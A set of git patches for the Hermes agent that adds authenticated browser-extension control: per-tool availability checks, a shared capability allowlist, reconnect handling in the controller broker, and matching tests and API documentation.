transport, + ) + assert response["error"]["code"] == 4403 + finally: + server._sessions.pop("registration-session-fixture", None) + + +def test_cloud_gateway_real_action_round_trip_is_bound_to_identity_and_transport(monkeypatch): monkeypatch.setattr( "gateway.browser_control_broker.browser_control_enabled", lambda: True ) @@ -211,7 +268,7 @@ def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_t "session_id": "session-fixture", "controller_id": "controller-fixture", "browser_profile_id": "browser-profile-fixture", - "capabilities": ["controller.noop", "browser_navigate"], + "capabilities": ["browser_navigate", "browser_cdp"], "principal_id": "spoofed-client-principal", }, }, @@ -220,7 +277,8 @@ def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_t scope_payload = registration["result"]["scope"] assert scope_payload["principal_id"] != "spoofed-client-principal" assert scope_payload["transport_family"] == "cloud-ticket-ws" - assert scope_payload["capabilities"] == ["controller.noop"] + assert scope_payload["capabilities"] == ["browser_navigate"] + assert "browser_cdp" not in BROWSER_CONTROL_CAPABILITIES missing_identity = server.dispatch( { @@ -268,15 +326,15 @@ def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_t assert foreign_heartbeat["error"]["code"] == 4403 outcome = {} - def dispatch_noop(): + def dispatch_navigate(): outcome["result"] = broker.dispatch( scope, - action="controller.noop", - arguments={"echo": "cloud"}, + action="browser_navigate", + arguments={"url": "https://example.test"}, tool_call_id="tool-call-cloud", ) - thread = threading.Thread(target=dispatch_noop) + thread = threading.Thread(target=dispatch_navigate) thread.start() assert ready.wait(timeout=1.0) command_event = frames[-1] @@ -309,8 +367,8 @@ def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_t try: rejected_outcome["result"] = broker.dispatch( scope, - action="controller.noop", - arguments={"echo": "reject"}, + action="browser_navigate", + arguments={"url": "https://reject.example.test"}, tool_call_id="tool-call-cloud-rejected", ) except Exception as exc: # asserted below diff --git a/tests/tools/test_browser_extension_router.py b/tests/tools/test_browser_extension_router.py index 66dcf4ea3e..9d7d69b1e4 100644 --- a/tests/tools/test_browser_extension_router.py +++ b/tests/tools/test_browser_extension_router.py @@ -115,6 +115,27 @@ def test_selected_controller_receives_immutable_arguments_and_context(): ] +def test_selected_controller_dict_result_is_serialized_for_registry_contract(): + broker = FakeBroker( + scope="scope-fixture", + selected="connection-fixture", + result={"ok": True, "title": "Example Domain", "refs": []}, + ) + + result = route_browser_tool( + "browser_snapshot", + {}, + fallback=lambda: pytest.fail("selected controller must not call fallback"), + broker=broker, + enabled=True, + session_id="session-fixture", + principal_id="principal-fixture", + transport_family="local-api", + ) + + assert result == '{"ok": true, "title": "Example Domain", "refs": []}' + + def test_selected_controller_failure_never_retries_through_existing_backend(): broker = FakeBroker( scope="scope-fixture", @@ -196,3 +217,105 @@ def test_routed_handler_reads_server_bound_identity_from_session_context(monkeyp "transport_family": "cloud-ticket-ws", }, ) + + +def test_routeable_browser_tools_are_available_for_bound_extension_controller(monkeypatch): + """The extension route must not be stripped by legacy Browser Use checks.""" + from tools import browser_tool + + monkeypatch.setattr(browser_tool, "check_browser_requirements", lambda: False) + monkeypatch.setattr( + browser_tool, + "extension_controller_available", + lambda action: action == "browser_snapshot", + ) + + assert browser_tool.check_browser_snapshot_requirements() is True + assert browser_tool.check_browser_click_requirements() is False + + +def test_extension_availability_requires_exact_scope_and_capability(monkeypatch): + from gateway import browser_control_broker + from gateway.session_context import clear_session_vars, set_session_vars + from tools import browser_extension_router + + broker = FakeBroker(scope="scope-fixture", selected="connection-fixture") + monkeypatch.setattr(browser_control_broker, "browser_control_enabled", lambda: True) + monkeypatch.setattr( + browser_control_broker, "get_browser_control_broker", lambda: broker + ) + tokens = set_session_vars( + session_id="session-fixture", + browser_control_principal="principal-fixture", + browser_control_transport_family="local-api", + ) + try: + assert browser_extension_router.extension_controller_available("browser_snapshot") is True + finally: + clear_session_vars(tokens) + + assert broker.calls == [ + ( + "scope", + { + "session_id": "session-fixture", + "principal_id": "principal-fixture", + "transport_family": "local-api", + }, + ), + ("select", "scope-fixture", "browser_snapshot"), + ] + + +def test_routeable_browser_tools_preserve_legacy_gate_without_bound_identity(monkeypatch): + """A feature flag alone must not advertise tools outside a bound request.""" + from gateway import browser_control_broker + from tools import browser_tool + + monkeypatch.setattr(browser_control_broker, "browser_control_enabled", lambda: True) + monkeypatch.setattr(browser_tool, "check_browser_requirements", lambda: False) + + assert browser_tool.check_browser_snapshot_requirements() is False + + +def test_bound_browser_request_bypasses_availability_caches(): + from gateway.session_context import clear_session_vars, set_session_vars + from tools.registry import CHECK_FN_CACHE_BYPASS, check_fn_cache_scope + + tokens = set_session_vars( + session_id="session-fixture", + browser_control_principal="principal-fixture", + browser_control_transport_family="local-api", + ) + try: + assert check_fn_cache_scope() == CHECK_FN_CACHE_BYPASS + finally: + clear_session_vars(tokens) + + +def test_registry_advertises_snapshot_through_extension_when_legacy_backend_is_down( + monkeypatch, +): + from gateway.session_context import clear_session_vars, set_session_vars + from tools import browser_tool + from tools.registry import registry + + monkeypatch.setattr(browser_tool, "check_browser_requirements", lambda: False) + monkeypatch.setattr( + browser_tool, + "extension_controller_available", + lambda action: action == "browser_snapshot", + ) + tokens = set_session_vars( + session_id="session-fixture", + browser_control_principal="principal-fixture", + browser_control_transport_family="local-api", + ) + try: + definitions = registry.get_definitions({"browser_snapshot", "browser_click"}, quiet=True) + finally: + clear_session_vars(tokens) + + assert [definition["function"]["name"] for definition in definitions] == [ + "browser_snapshot" + ] diff --git a/tests/tools/test_browser_extension_router_wiring.py b/tests/tools/test_browser_extension_router_wiring.py index 0a81b9c567..bbdd4bf1be 100644 --- a/tests/tools/test_browser_extension_router_wiring.py +++ b/tests/tools/test_browser_extension_router_wiring.py @@ -1,4 +1,4 @@ -"""Wiring regression tests for the Phase 4 browser extension router. +"""Wiring regression tests for the browser extension router. These guard the *registry wiring* — that every ``browser_*`` handler routes through :func:`tools.browser_extension_router.routed_browser_handler` with diff --git a/tools/browser_extension_router.py b/tools/browser_extension_router.py index 7a0429e02e..34e1aa5918 100644 --- a/tools/browser_extension_router.py +++ b/tools/browser_extension_router.py @@ -1,4 +1,4 @@ -"""Phase 4 registry-level browser extension router. +"""Registry-level browser extension router. This module is the *agent-side* half of the browser-extension-control feature: it decides, for one registry ``browser_*`` handler invocation, @@ -40,12 +40,55 @@ config change is honored without restart. from __future__ import annotations +import json import logging from typing import Any, Callable, Dict, Optional logger = logging.getLogger(__name__) +def extension_controller_available(action: str) -> bool: + """Whether this request owns one exact controller capable of ``action``. + + Tool-schema assembly runs inside the API request's session context, before + a model can call a browser tool. The legacy browser backend's availability + probe cannot decide whether the extension route is usable, so routeable + tools consult the process-local broker directly. Missing server-bound + identity, ambiguous scope, a detached controller, or a capability mismatch + all fail closed. + """ + try: + from gateway.browser_control_broker import ( + browser_control_enabled, + get_browser_control_broker, + ) + from gateway.session_context import get_session_env + + if not browser_control_enabled(): + return False + session_id = get_session_env("HERMES_SESSION_ID", "") or None + principal_id = get_session_env("HERMES_BROWSER_CONTROL_PRINCIPAL", "") or None + transport_family = get_session_env( + "HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY", "" + ) or None + if not session_id or not principal_id or not transport_family: + return False + broker = get_browser_control_broker() + scope = broker.scope_for_session( + session_id=session_id, + principal_id=principal_id, + transport_family=transport_family, + ) + return scope is not None and broker.select(scope, action) is not None + except Exception: + logger.debug( + "browser extension availability check failed for %s", + action, + exc_info=True, + ) + return False + + def route_browser_tool( action: str, args: Dict[str, Any], @@ -114,10 +157,16 @@ def route_browser_tool( return fallback() # A controller was selected: it is authoritative. Never retry through the - # existing backend, whatever happens here. - return broker.dispatch( + # existing backend, whatever happens here. Registry handlers must return a + # string (or the dedicated multimodal envelope), while controller transports + # naturally complete with decoded JSON values. Preserve existing string + # results byte-for-byte and serialize decoded values at this boundary. + result = broker.dispatch( scope, action=action, arguments=args, tool_call_id=tool_call_id ) + if isinstance(result, str): + return result + return json.dumps(result, ensure_ascii=False) def current_tool_call_id() -> str: @@ -149,7 +198,7 @@ def routed_browser_handler( ) -> Any: """Lazy registry-handler route wrapper for ``browser_*`` tools. - Resolves the Phase 4 feature flag and process-local broker lazily so the + Resolves the feature flag and process-local broker lazily so the default (feature off) path costs one cached config read and an immediate fallback, and so importing ``tools.browser_tool`` never imports the gateway. When the gateway cannot be imported or the feature is off, the diff --git a/tools/browser_tool.py b/tools/browser_tool.py index 3cd08451f3..3d191a874c 100644 --- a/tools/browser_tool.py +++ b/tools/browser_tool.py @@ -5390,7 +5390,10 @@ if __name__ == "__main__": # Registry # --------------------------------------------------------------------------- from tools.registry import registry, tool_error -from tools.browser_extension_router import routed_browser_handler +from tools.browser_extension_router import ( + extension_controller_available, + routed_browser_handler, +) _BROWSER_SCHEMA_MAP = {s["name"]: s for s in BROWSER_TOOL_SCHEMAS} @@ -5403,6 +5406,39 @@ def _browser_router_kw(kw: dict) -> dict: } +def check_browser_routed_requirements(action: str = "browser_snapshot") -> bool: + """Availability gate for tools that can use either browser backend.""" + return check_browser_requirements() or extension_controller_available(action) + + +def check_browser_navigate_requirements() -> bool: + return check_browser_routed_requirements("browser_navigate") + + +def check_browser_snapshot_requirements() -> bool: + return check_browser_routed_requirements("browser_snapshot") + + +def check_browser_click_requirements() -> bool: + return check_browser_routed_requirements("browser_click") + + +def check_browser_type_requirements() -> bool: + return check_browser_routed_requirements("browser_type") + + +def check_browser_scroll_requirements() -> bool: + return check_browser_routed_requirements("browser_scroll") + + +def check_browser_back_requirements() -> bool: + return check_browser_routed_requirements("browser_back") + + +def check_browser_press_requirements() -> bool: + return check_browser_routed_requirements("browser_press") + + registry.register( name="browser_navigate", toolset="browser", @@ -5413,7 +5449,7 @@ registry.register( fallback=lambda: browser_navigate(url=args.get("url", ""), task_id=kw.get("task_id")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_navigate_requirements, emoji="🌐", ) registry.register( @@ -5427,7 +5463,7 @@ registry.register( full=args.get("full", False), task_id=kw.get("task_id"), user_task=kw.get("user_task")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_snapshot_requirements, emoji="📸", ) registry.register( @@ -5440,7 +5476,7 @@ registry.register( fallback=lambda: browser_click(ref=args.get("ref", ""), task_id=kw.get("task_id")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_click_requirements, emoji="👆", ) registry.register( @@ -5453,7 +5489,7 @@ registry.register( fallback=lambda: browser_type(ref=args.get("ref", ""), text=args.get("text", ""), task_id=kw.get("task_id")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_type_requirements, emoji="⌨️", ) registry.register( @@ -5466,7 +5502,7 @@ registry.register( fallback=lambda: browser_scroll(direction=args.get("direction", "down"), task_id=kw.get("task_id")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_scroll_requirements, emoji="📜", ) registry.register( @@ -5479,7 +5515,7 @@ registry.register( fallback=lambda: browser_back(task_id=kw.get("task_id")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_back_requirements, emoji="◀️", ) registry.register( @@ -5492,7 +5528,7 @@ registry.register( fallback=lambda: browser_press(key=args.get("key", ""), task_id=kw.get("task_id")), **_browser_router_kw(kw), ), - check_fn=check_browser_requirements, + check_fn=check_browser_press_requirements, emoji="⌨️", ) diff --git a/tools/registry.py b/tools/registry.py index 16fbc071a8..bf6d52f2ee 100644 --- a/tools/registry.py +++ b/tools/registry.py @@ -305,11 +305,30 @@ def _prune_check_fn_caches(now: float) -> None: def check_fn_cache_scope() -> Optional[str]: """Return the active profile key when availability is profile-scoped. + Browser-controller availability is request-bound and can change on every + attach/detach. A fully bound browser-control request therefore bypasses both + this check cache and model_tools' outer definition cache; the same sentinel + is consumed by both layers. This prevents one Browser session's live tools + from leaking into any unrelated session. + Single-profile processes intentionally keep the historical process-wide cache. A multiplex gateway installs a Hermes-home override for every profile turn, so the canonical profile key is the stable isolation boundary across repeated turns for that profile. """ + try: + from gateway.session_context import get_session_env + + browser_identity = ( + get_session_env("HERMES_SESSION_ID", ""), + get_session_env("HERMES_BROWSER_CONTROL_PRINCIPAL", ""), + get_session_env("HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY", ""), + ) + if all(str(value or "").strip() for value in browser_identity): + return CHECK_FN_CACHE_BYPASS + except Exception: + pass + try: from agent.secret_scope import is_multiplex_active diff --git a/tui_gateway/methods_browser_control.py b/tui_gateway/methods_browser_control.py index 8ce1c53fba..98819a3e2f 100644 --- a/tui_gateway/methods_browser_control.py +++ b/tui_gateway/methods_browser_control.py @@ -1,4 +1,4 @@ -"""Browser controller registration / result routing (Phase 4 Cloud). +"""Browser controller registration and result routing for the dashboard. The dashboard's browser controller (the extension that physically drives a browser) registers itself over the authenticated ``/api/ws`` JSON-RPC @@ -19,9 +19,9 @@ when the request arrives on the same transport that owns the session, and only for the exact attached scope — the broker's exact-scope ``complete`` is the last line of defense against cross-tenant completion. -Phase 4 is deliberately minimal: the only capability a controller may hold is -``controller.noop``, exercised end-to-end by -``tests/gateway/test_browser_control_cloud.py``. +Both dashboard and local API transports use the broker's shared, explicit +capability allowlist. Raw CDP, script evaluation, console access, uploads, and +other privileged surfaces are not controller capabilities. Note on handler globals: ``HandlerRegistry.install`` (method_ctx.py) rebinds each handler's ``__globals__`` onto server.py's namespace, so handler bodies @@ -36,6 +36,12 @@ from __future__ import annotations import hashlib import logging +from gateway.browser_control_broker import ( + BROWSER_CONTROL_PROTOCOL_VERSION, + browser_control_protocol_supported, + filter_browser_control_capabilities, +) + from .method_ctx import HandlerRegistry logger = logging.getLogger(__name__) @@ -43,11 +49,6 @@ logger = logging.getLogger(__name__) _registry = HandlerRegistry() method = _registry.method -#: Capabilities a Cloud/dashboard controller may register in Phase 4. Any -#: capability outside this set is silently filtered out (fail closed: an -#: empty intersection rejects the registration). -_CONTROLLER_CAPABILITIES = frozenset({"controller.noop"}) - #: Transport family stamped into every scope attached from this gateway. The #: broker's exact-match contract treats it as an identity field, so an API #: transport can never address a dashboard controller (and vice versa). @@ -131,7 +132,9 @@ def _( rid, params: dict, _family=_CLOUD_TRANSPORT_FAMILY, - _caps=_CONTROLLER_CAPABILITIES, + _protocol_version=BROWSER_CONTROL_PROTOCOL_VERSION, + _protocol_supported=browser_control_protocol_supported, + _filter_capabilities=filter_browser_control_capabilities, _forbidden=_ERR_FORBIDDEN, _identity_ok=_is_authenticated_identity, _digest=_principal_digest, @@ -146,8 +149,7 @@ def _( identity (``WSTransport.auth_identity`` — never the RPC params); * the named session exists in the live session registry and its ``transport`` is exactly the calling transport; - * at least one requested capability survives the filter to - ``controller.noop``. + * at least one requested capability survives the shared allowlist. The returned ``scope`` names a server-derived ``principal_id``, the ``cloud-ticket-ws`` transport family, and the filtered capability set. @@ -161,6 +163,13 @@ def _( "browser.extension_control.enabled is not set", ) + if not _protocol_supported(params.get("protocol_version")): + return _err( + rid, + _forbidden, + f"unsupported browser-control protocol version; expected {_protocol_version}", + ) + transport = current_transport() identity = getattr(transport, "auth_identity", None) if not _identity_ok(identity): @@ -191,8 +200,7 @@ def _( "controller_id, browser_profile_id, and server session profile are required", ) - requested = params.get("capabilities") or [] - capabilities = frozenset(cap for cap in requested if cap in _caps) + capabilities = _filter_capabilities(params.get("capabilities")) if not capabilities: return _err( rid, @@ -285,8 +293,7 @@ def _( # Defense in depth: the exact-scope complete below already rejects any # foreign scope, but the owner check makes the "same transport" rule # explicit at this layer too. - controller = broker.select(scope, "controller.noop") - if controller is None or controller.owner is not transport: + if not broker.is_owner(scope, transport): return _err( rid, _forbidden, @@ -333,8 +340,7 @@ def _( ) if scope is None: return _err(rid, _forbidden, "no controller registered for this session") - controller = broker.select(scope, "controller.noop") - if controller is None or controller.owner is not transport: + if not broker.is_owner(scope, transport): return _err(rid, _forbidden, "controller is not owned by this transport") return _ok(rid, {"ok": True}) diff --git a/tui_gateway/ws.py b/tui_gateway/ws.py index 5ac36b5676..47d0f9b1ef 100644 --- a/tui_gateway/ws.py +++ b/tui_gateway/ws.py @@ -463,7 +463,7 @@ async def handle_ws( server.unregister_live_transport(transport) # Owner-safely detach browser controllers this transport - # registered (Phase 4 Cloud). The socket itself is closing, so no + # registered. The socket itself is closing, so no # peer cancel write is attempted; every server-side pending command # is still failed closed immediately. try: diff --git a/website/docs/developer-guide/programmatic-integration.md b/website/docs/developer-guide/programmatic-integration.md index 42a603215e..7e9c1f6c3b 100644 --- a/website/docs/developer-guide/programmatic-integration.md +++ b/website/docs/developer-guide/programmatic-integration.md @@ -112,6 +112,8 @@ POST /v1/runs/{id}/approval Resolve a pending approval POST /v1/runs/{id}/steer Inject mid-run guidance at the next tool boundary POST /v1/runs/{id}/stop Interrupt the run GET /v1/capabilities Machine-readable feature flags +POST /v1/browser-control/register Register a browser controller +GET /v1/browser-control/ws Browser-controller WebSocket GET /v1/models Lists hermes-agent GET /api/model/options Provider-aware picker inventory GET /health, /health/detailed @@ -119,6 +121,11 @@ GET /health, /health/detailed Setup, headers (`X-Hermes-Session-Id`, `X-Hermes-Session-Key`), and frontend wiring: [API Server](../user-guide/features/api-server). +Browser extensions can opt into the disabled-by-default controller protocol to +drive the exact browser session that opened the Hermes conversation. The API +and dashboard transports share one principal-bound broker and one explicit +capability allowlist; see [Browser-extension control](../user-guide/features/api-server#browser-extension-control). + ### Model catalog surfaces The OpenAI-compatible API intentionally keeps `GET /v1/models` minimal: it is diff --git a/website/docs/user-guide/features/api-server.md b/website/docs/user-guide/features/api-server.md index ccba76e104..66e7f9bc92 100644 --- a/website/docs/user-guide/features/api-server.md +++ b/website/docs/user-guide/features/api-server.md @@ -259,6 +259,75 @@ Returns a machine-readable description of the API server's stable surface for ex Use this endpoint when integrating dashboards, browser UIs, or control planes so they can discover whether the running Hermes version supports runs, streaming, cancellation, and session continuity without depending on private Python internals. +## Browser-extension control + +Hermes can route browser tools through an authenticated extension that controls +the browser session associated with the current Hermes session. The feature is +disabled by default; set `browser.extension_control.enabled` to `true` to opt in: + +```yaml +browser: + extension_control: + enabled: true +``` + +The local API path also requires the API server bearer key. A controller may +register only for an existing server session. Hermes derives the controller +principal from authenticated server state; a client-supplied `principal_id` is +ignored. + +Discover the live contract through `GET /v1/capabilities`. The +`browser_extension_control` object reports whether the feature is enabled, the +protocol version, transport names, and the exact capability allowlist: + +```text +controller.noop +browser_back +browser_click +browser_navigate +browser_press +browser_screenshot +browser_scroll +browser_snapshot +browser_tab_activate +browser_tabs +browser_type +``` + +Requested capabilities outside that list are filtered out. Raw CDP, arbitrary +script evaluation, console access, uploads, image extraction, and vision are not +part of the controller protocol. + +### Local API registration + +1. Send an authenticated `POST /v1/browser-control/register` with + `protocol_version`, `session_id`, `controller_id`, `browser_profile_id`, and + the requested `capabilities`. +2. Hermes returns a single-use ticket with a 30-second TTL and the filtered, + server-bound controller scope. +3. Open `GET /v1/browser-control/ws` with both WebSocket subprotocols: + `hermes-browser-control-v1` and + `hermes-browser-control-ticket.`. + +The ticket is never accepted in the query string. Unknown, expired, reused, or +malformed tickets fail before WebSocket upgrade. + +### Controller frames + +Hermes sends `browser.controller.command` frames containing `command_id`, +`action`, immutable `arguments`, browser/controller ids, and the originating +`tool_call_id`. The controller replies with `browser.controller.result`, the +same `command_id`, an exact boolean `ok`, and either `result` or `error`. +Cancellation and timeout emit `browser.controller.cancel`; late results are +ignored. + +The authenticated dashboard transport exposes the same registration, result, +heartbeat, capability, and ownership semantics over its Gateway RPC/event +channel. In both transports, selection requires one unambiguous exact match on +principal, profile, session, controller, browser profile, transport family, and +capability. Once selected, a controller failure is authoritative and is never +retried through a different browser backend. + ## Per-request model selection Authenticated clients can override Hermes' default model selection per request From 095a1d078c5c1cf7a55d47cafc50179fc463e790 Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Thu, 13 Aug 2026 22:08:43 +0700 Subject: [PATCH 012/161] fix(browser): preserve controller work across reconnects Treat unexpected controller transport loss as recoverable until each command's original deadline. Same-identity reconnects refresh transport and capability state, flush deferred cancels before new dispatch, and can complete already-started work. Keep explicit detach and different controller/browser identity replacement terminal, owner-gate every inbound lifecycle frame, distinguish slow in-flight WebSocket writes from real send failures, and exclude browser-control session identity from shared shell snapshots. --- gateway/browser_control_broker.py | 316 ++++++++++++++---- gateway/platforms/api_server.py | 87 +++-- tests/gateway/test_browser_control_api.py | 194 ++++++++++- .../test_browser_control_broker_hardening.py | 252 +++++++++++++- tests/gateway/test_browser_control_cloud.py | 186 +++++++++++ tests/tools/test_snapshot_session_id_leak.py | 1 + tools/environments/base.py | 4 +- tui_gateway/methods_browser_control.py | 34 ++ tui_gateway/ws.py | 14 +- .../docs/user-guide/features/api-server.md | 12 + 10 files changed, 987 insertions(+), 113 deletions(-) diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index cba0df58d5..4ed28d48fc 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -28,10 +28,12 @@ Contract (each rule is exercised by tests/gateway/test_browser_control_broker.py - **Exact identity and capability selection.** ``attach`` registers a send callback under a :class:`ControllerScope`; ``select`` returns a controller - only when the caller's scope matches on *every* identity field — + only when the caller's scope matches on *every stable identity field* — principal, profile, session, controller id, browser profile id, and transport family — and the requested capability is present in the - controller's capability set. Partial matches return ``None``. + controller's current negotiated capability set. Partial matches return + ``None``. A same-identity reconnect may renegotiate capabilities without + creating an ambiguous second controller. - **One pending command per command id; single-shot completion.** Each ``dispatch`` mints a fresh command id, emits one @@ -48,6 +50,13 @@ Contract (each rule is exercised by tests/gateway/test_browser_control_broker.py :class:`ControllerCancelled` rather than hanging or racing a detached controller's late ``complete``. +- **Unexpected disconnects are recoverable.** ``disconnect`` marks an exact + transport owner offline without accepting new dispatches or cancelling + already-running work. Re-attaching the same stable identity refreshes the + transport callback and can deliver a terminal result for the original + command. Explicit detach, cancel, identity replacement, and timeout remain + terminal boundaries. + Thread-safety: all public state transitions happen under a single reentrant lock; the send callback is invoked *outside* the lock so a controller may synchronously ``complete`` from inside its own send (the no-op round trip), @@ -70,6 +79,8 @@ _OWNER_UNSET = object() DEFAULT_TICKET_TTL = 30.0 #: Default wall time a dispatch waits for the controller to complete. DEFAULT_COMMAND_TIMEOUT = 30.0 +#: Maximum cancel frames retained while a same-identity controller is offline. +MAX_DEFERRED_CANCELS = 512 #: Current wire protocol version. Registration requires this exact integer; #: booleans are rejected even though ``bool`` subclasses ``int`` in Python. @@ -163,6 +174,22 @@ class ControllerScope: capabilities: frozenset = frozenset() +def _scope_identity(scope: ControllerScope) -> tuple: + """Return stable controller identity, excluding negotiated capabilities.""" + return ( + scope.principal_id, + scope.profile_id, + scope.session_id, + scope.controller_id, + scope.browser_profile_id, + scope.transport_family, + ) + + +def _same_scope_identity(first: ControllerScope, second: ControllerScope) -> bool: + return _scope_identity(first) == _scope_identity(second) + + @dataclass(frozen=True) class Ticket: """Opaque, single-use registration credential.""" @@ -183,6 +210,8 @@ class _Controller: scope: ControllerScope send: Callable[[dict], None] owner: Any = None + connected: bool = True + deferred_cancels: list[dict] = field(default_factory=list) # Serialize command/cancel writes with detach or replacement. Broker state # is never held while waiting for this lock, so a transport callback may # synchronously call complete() without deadlocking the broker. @@ -281,72 +310,155 @@ class BrowserControlBroker: *, owner: Any = None, ) -> None: - """Register the controller owning ``scope`` with frame callback ``send``. + """Attach or refresh the controller for one stable identity. - Re-attaching an already-attached scope replaces the prior controller - (logged); a controller that wants to go away must call ``detach``. + A reconnect with the same principal/profile/session/controller/browser + profile/transport identity refreshes the send callback and negotiated + capabilities without cancelling pending work. Capabilities are not an + identity field. A different controller or browser profile in the same + authenticated session lane hard-replaces the previous identity. """ - replacement = _Controller(scope=scope, send=send, owner=owner) - with self._lock: - existing = self._controllers.get(scope) - if existing is None: + while True: with self._lock: - # A concurrent attach may have won after the optimistic read; - # retry through the replacement path rather than overwriting it. - existing = self._controllers.get(scope) - if existing is None: - self._controllers[scope] = replacement + existing_entry = next( + ( + (candidate_scope, controller) + for candidate_scope, controller in self._controllers.items() + if _same_scope_identity(candidate_scope, scope) + ), + None, + ) + lane_scopes = [ + candidate_scope + for candidate_scope in self._controllers + if candidate_scope.principal_id == scope.principal_id + and candidate_scope.profile_id == scope.profile_id + and candidate_scope.session_id == scope.session_id + and candidate_scope.transport_family == scope.transport_family + and not _same_scope_identity(candidate_scope, scope) + ] + if existing_entry is None and not lane_scopes: + self._controllers[scope] = _Controller( + scope=scope, + send=send, + owner=owner, + ) return - assert existing is not None - logger.warning( - "browser controller re-attached for scope %r; replacing prior controller", - scope, - ) - with existing.send_lock: - with self._lock: - if self._controllers.get(scope) is not existing: - # Another replacement won while this caller waited. Re-run - # against the new generation so its pending work is not - # orphaned by an unconditional overwrite. - retry = True - pendings = [] - else: - retry = False - pendings = self._pending_for_scope_locked(scope) - for pending in pendings: - self._resolve_pending(pending, cancelled=True) - self._controllers[scope] = replacement - if not retry: - self._emit_cancel_frames(existing, pendings) + # A different identity in the same authenticated session lane is a + # hard replacement, not a recoverable reconnect. Terminalize it + # before inserting the successor so session lookup stays unique. + if lane_scopes: + for lane_scope in lane_scopes: + self.detach(lane_scope, notify_controller=False) + continue + + if existing_entry is not None: + existing_scope, existing = existing_entry + + with existing.send_lock: + with self._lock: + if self._controllers.get(existing_scope) is not existing: + continue + self._controllers.pop(existing_scope, None) + existing.scope = scope + existing.send = send + existing.owner = owner + existing.connected = False + for pending in self._pending.values(): + if _same_scope_identity(pending.scope, scope): + pending.scope = scope + deferred = list(existing.deferred_cancels) + existing.deferred_cancels.clear() + self._controllers[scope] = existing + + unsent: list[dict] = [] + for index, frame in enumerate(deferred): + try: + send(frame) + except Exception: + logger.exception( + "failed to flush deferred browser-controller cancel" + ) + unsent = deferred[index:] + break + if unsent: + with self._lock: + if self._controllers.get(scope) is existing: + existing.deferred_cancels = unsent[ + -MAX_DEFERRED_CANCELS: + ] + raise ConnectionError( + "browser controller reconnect could not flush deferred cancels" + ) + with self._lock: + if self._controllers.get(scope) is existing: + existing.connected = True return - self.attach(scope, send, owner=owner) def select(self, scope: ControllerScope, capability: str) -> Optional[_Controller]: - """Return the controller exactly matching ``scope`` and ``capability``. + """Return the connected controller matching identity and capability. - ``None`` when any identity field differs or the capability is not in - the controller's capability set. The controller's own scope is the - authority on capabilities. + The caller's capabilities are not authoritative on reconnect. Selection + matches the stable identity fields, then checks the attached + controller's current negotiated capability set. Offline controllers + preserve old pending work but never accept new dispatches. """ with self._lock: - controller = self._controllers.get(scope) - if controller is None: - return None - if capability not in controller.scope.capabilities: - return None - return controller + matches = [ + controller + for controller in self._controllers.values() + if _same_scope_identity(controller.scope, scope) + and controller.connected + and capability in controller.scope.capabilities + ] + return matches[0] if len(matches) == 1 else None def is_owner(self, scope: ControllerScope, owner: Any) -> bool: - """Return whether ``owner`` is the exact transport attached to ``scope``. + """Return whether ``owner`` is the exact live transport for ``scope``. Ownership is independent of capabilities. Transport handlers use this for heartbeat and result admission so a least-privilege controller does not need to request ``controller.noop`` merely to complete a real action. """ with self._lock: - controller = self._controllers.get(scope) - return controller is not None and controller.owner is owner + matches = [ + controller + for controller in self._controllers.values() + if _same_scope_identity(controller.scope, scope) + and controller.connected + and controller.owner is owner + ] + return len(matches) == 1 + + def disconnect( + self, + scope: ControllerScope, + *, + owner: Any = _OWNER_UNSET, + ) -> bool: + """Mark one exact controller transport offline without cancelling work.""" + with self._lock: + entry = next( + ( + (candidate_scope, controller) + for candidate_scope, controller in self._controllers.items() + if _same_scope_identity(candidate_scope, scope) + ), + None, + ) + if entry is None: + return False + candidate_scope, controller = entry + with controller.send_lock: + with self._lock: + if self._controllers.get(candidate_scope) is not controller: + return False + if owner is not _OWNER_UNSET and controller.owner is not owner: + return False + controller.connected = False + controller.owner = None + return True def detach( self, @@ -428,19 +540,28 @@ class BrowserControlBroker: }, } pending = _PendingCommand( - scope=scope, + scope=controller.scope, command_id=command_id, tool_call_id=tool_call_id, ) with controller.send_lock: with self._lock: # select() intentionally runs outside the send lock. Revalidate - # the exact controller generation after acquiring it so detach - # or replacement cannot leave a stale command waiting forever. - if self._controllers.get(scope) is not controller: + # the exact live controller after acquiring it so disconnect or + # identity replacement cannot leave a stale command waiting. + attached = next( + ( + candidate + for candidate in self._controllers.values() + if _same_scope_identity(candidate.scope, scope) + ), + None, + ) + if attached is not controller or not controller.connected: raise ControllerUnavailable( f"controller for scope {scope!r} detached before dispatch" ) + pending.scope = controller.scope self._pending[command_id] = pending try: @@ -464,9 +585,21 @@ class BrowserControlBroker: if timed_out: with controller.send_lock: with self._lock: - still_attached = self._controllers.get(scope) is controller - if still_attached: - self._emit_cancel_frames(controller, [pending]) + active = next( + ( + candidate + for candidate in self._controllers.values() + if _same_scope_identity(candidate.scope, scope) + ), + None, + ) + if active is None: + active = controller + if not active.connected: + self._defer_cancel_locked(active, pending) + active = None + if active is not None: + self._emit_cancel_frames(active, [pending]) raise ControllerTimeout( f"controller did not complete command {command_id!r} " f"within {self._command_timeout}s" @@ -517,17 +650,32 @@ class BrowserControlBroker: without inventing state). """ with self._lock: - controller = self._controllers.get(scope) - if controller is None: + controller = next( + ( + candidate + for candidate in self._controllers.values() + if _same_scope_identity(candidate.scope, scope) + ), + None, + ) + if controller is None or not controller.connected: return False with controller.send_lock: with self._lock: - if self._controllers.get(scope) is not controller: + attached = next( + ( + candidate + for candidate in self._controllers.values() + if _same_scope_identity(candidate.scope, scope) + ), + None, + ) + if attached is not controller or not controller.connected: return False target = None for pending in self._pending.values(): if ( - pending.scope == scope + _same_scope_identity(pending.scope, scope) and pending.tool_call_id == 